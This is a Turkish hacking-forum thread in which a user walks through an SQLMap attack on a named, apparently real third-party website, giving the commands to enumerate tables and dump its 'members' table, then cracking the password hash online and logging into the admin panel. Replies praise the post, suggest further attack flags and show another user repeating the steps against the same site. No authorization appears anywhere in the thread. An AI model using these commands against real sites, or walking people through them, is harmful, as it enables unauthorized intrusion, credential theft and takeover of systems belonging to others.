SQLMap nedir, nasıl kullanılır.

levidomates · 3 Tem 2023

SQLMap

SQLMap, SQL enjeksiyon açıklarını tespit etmek ve bu açıklardan yararlanarak veritabanına erişim sağlamak için kullanılan bir araçtır. Şimdi gelin nasıl kullanıldığına bir göz atalım.

Hedef sitemiz -> How to link to our articles

SQLMap Kurulumu

Kullanımına geçmeden önce SQLMap kurulumunu kısaca gösterelim.

Kod:

sudo apt-get install sqlmap

SQLMap Kullanımı

sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --tables --answers="*"

-u parametresi url ifade ediyor -u parametresinden sonra taranmasını istediğimiz url giriyoruz.

--tables tarama eğer başarılı olursa elde ettiği database içerisindeki tabloları yazdırmasını istiyoruz.

--answers="*" bütün sorulara yes yanıtını veriyoruz.

Tarama sonrasında elimize tablolar düştü burada dikkat çeken bir tablo var members tablosu, şimdi bu tablo içerisindeki kolonlara bakalım.

sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --columns -T members

--columns parametresini tablo içerisindeki kolonları görmek için kullanıyoruz.

-T parametresi tablo anlamına geliyor yanına kolonlarını görmek istediğimiz tabloyu yazıyoruz.

Şimdi kolonların içerisindeki verileri görmek için --columns yerine --dump parametresini kullanıyoruz.

sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --dump -T members

Elimize hash'li bir şifre ve kullanıcı adı geçti şimdi hash kırmaya çalışalım.

Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online sitesini kullanarak şans eseri hash'İ kırmayı başardım.

Hedef url'nin sonuna admin yazıyorum ve şans eseri admin panelini buluyorum geriye şifre ve kullanıcı adını kullanarak giriş yapmak kaldı.

Ve içerdeyim

Benim anlatıcaklarım bu kadardı umarım faydalı bir konu olmuştur. Bu arada sqlmap biraz şans işi her seferinde işe yaramıyor biraz şansınızın olması gerekiyor.

Arenklord · 3 Tem 2023

Eline sağlık ancak daha detaylı ve geniş olabilirdi bazı paremmetreleri anlatabiliridin "--dbs, --random-agent, ya da shel paremetreleri" yine de eline sağlık

levidomates · 3 Tem 2023

Arenklord' Alıntı:
Eline sağlık ancak daha detaylı ve geniş olabilirdi bazı paremmetreleri anlatabiliridin "--dbs, --random-agent, ya da shel paremetreleri" yine de eline sağlık

Yorumun için teşekkür ederim ben de hazırlarken biraz eksik kaldığını fark ettim, uygulamalı olarak göstermek istediğim için çok detaya inemedim.

Arenklord · 3 Tem 2023

levidomates' Alıntı:
Yorumun için teşekkür ederim ben de hazırlarken biraz eksik kaldığını fark ettim, uygulamalı olarak göstermek istediğim için çok detaya inemedim.

Yine de başarılı başlangıç için eline sağlık

takeacareofpizza · 3 Tem 2023

Güzel konu teşekkürler Görsel anlatımlı olması ayrı bir harika

levidomates · 3 Tem 2023

takeacareofpizza' Alıntı:
Güzel konu teşekkürler Görsel anlatımlı olması ayrı bir harika

Teşekkür ederim.

QuatrexDefacer · 3 Tem 2023

eline saglk sqlmap unutlmsdu konu icin guzel oldu

levidomates · 3 Tem 2023

QuatrexDefacer' Alıntı:
eline saglk sqlmap unutlmsdu konu icin guzel oldu

Teşekkür ederim.

Rochelle · 3 Tem 2023

levidomates' Alıntı:
SQLMap

SQLMap, SQL enjeksiyon açıklarını tespit etmek ve bu açıklardan yararlanarak veritabanına erişim sağlamak için kullanılan bir araçtır. Şimdi gelin nasıl kullanıldığına bir göz atalım.

Hedef sitemiz -> How to link to our articles

SQLMap Kurulumu

Kullanımına geçmeden önce SQLMap kurulumunu kısaca gösterelim.

Kod:

sudo apt-get install sqlmap

SQLMap Kullanımı

sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --tables --answers="*"

-u parametresi url ifade ediyor -u parametresinden sonra taranmasını istediğimiz url giriyoruz.

--tables tarama eğer başarılı olursa elde ettiği database içerisindeki tabloları yazdırmasını istiyoruz.

--answers="*" bütün sorulara yes yanıtını veriyoruz.

Tarama sonrasında elimize tablolar düştü burada dikkat çeken bir tablo var members tablosu, şimdi bu tablo içerisindeki kolonlara bakalım.

sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --columns -T members

--columns parametresini tablo içerisindeki kolonları görmek için kullanıyoruz.

-T parametresi tablo anlamına geliyor yanına kolonlarını görmek istediğimiz tabloyu yazıyoruz.

Şimdi kolonların içerisindeki verileri görmek için --columns yerine --dump parametresini kullanıyoruz.

sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --dump -T members

Elimize hash'li bir şifre ve kullanıcı adı geçti şimdi hash kırmaya çalışalım.

Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online sitesini kullanarak şans eseri hash'İ kırmayı başardım.

Hedef url'nin sonuna admin yazıyorum ve şans eseri admin panelini buluyorum geriye şifre ve kullanıcı adını kullanarak giriş yapmak kaldı.

Ve içerdeyim

Benim anlatıcaklarım bu kadardı umarım faydalı bir konu olmuştur. Bu arada sqlmap biraz şans işi her seferinde işe yaramıyor biraz şansınızın olması gerekiyor.

İşletim Sisteminin Terminal Ekranı çok Tarz Duruyor Hangi işletim sistemi acaba?

levidomates · 3 Tem 2023

Rochelle' Alıntı:
İşletim Sisteminin Terminal Ekranı çok Tarz Duruyor Hangi işletim sistemi acaba?

Teşekkür ederim ubuntu kullanıyorum farklı temalarda var ben çok beğeniyorum ubuntunun terminal temalarını.

Warth · 3 Tem 2023

eline sağlık

levidomates · 3 Tem 2023

Warth' Alıntı:
eline sağlık

Teşekkür ederim.

Criminal Laoin · 3 Tem 2023

Eline sağlık

levidomates · 3 Tem 2023

Criminal Laoin' Alıntı:
Eline sağlık

Teşekkür ederim

Teadorx · 15 Kas 2023

levidomates' Alıntı:
SQLMap

SQLMap, SQL enjeksiyon açıklarını tespit etmek ve bu açıklardan yararlanarak veritabanına erişim sağlamak için kullanılan bir araçtır. Şimdi gelin nasıl kullanıldığına bir göz atalım.

Hedef sitemiz -> How to link to our articles

SQLMap Kurulumu

Kullanımına geçmeden önce SQLMap kurulumunu kısaca gösterelim.

Kod:

sudo apt-get install sqlmap

SQLMap Kullanımı

sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --tables --answers="*"

-u parametresi url ifade ediyor -u parametresinden sonra taranmasını istediğimiz url giriyoruz.

--tables tarama eğer başarılı olursa elde ettiği database içerisindeki tabloları yazdırmasını istiyoruz.

--answers="*" bütün sorulara yes yanıtını veriyoruz.

Tarama sonrasında elimize tablolar düştü burada dikkat çeken bir tablo var members tablosu, şimdi bu tablo içerisindeki kolonlara bakalım.

sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --columns -T members

--columns parametresini tablo içerisindeki kolonları görmek için kullanıyoruz.

-T parametresi tablo anlamına geliyor yanına kolonlarını görmek istediğimiz tabloyu yazıyoruz.

Şimdi kolonların içerisindeki verileri görmek için --columns yerine --dump parametresini kullanıyoruz.

sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --dump -T members

Elimize hash'li bir şifre ve kullanıcı adı geçti şimdi hash kırmaya çalışalım.

Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online sitesini kullanarak şans eseri hash'İ kırmayı başardım.

Hedef url'nin sonuna admin yazıyorum ve şans eseri admin panelini buluyorum geriye şifre ve kullanıcı adını kullanarak giriş yapmak kaldı.

Ve içerdeyim

Benim anlatıcaklarım bu kadardı umarım faydalı bir konu olmuştur. Bu arada sqlmap biraz şans işi her seferinde işe yaramıyor biraz şansınızın olması gerekiyor.

Sitenin sonuna admin yazınca bir hata alıyorum

SQLMap nedir, nasıl kullanılır.

levidomates

Üye

Arenklord

Uzman üye

levidomates

Üye

Arenklord

Uzman üye

takeacareofpizza

Üye

levidomates

Üye

QuatrexDefacer

Katılımcı Üye

levidomates

Üye

Rochelle

Üye

levidomates

Üye

Warth

Üye

levidomates

Üye

Criminal Laoin

Uzman üye

levidomates

Üye

Teadorx

Yeni üye

Sosyal medya sayfalarımız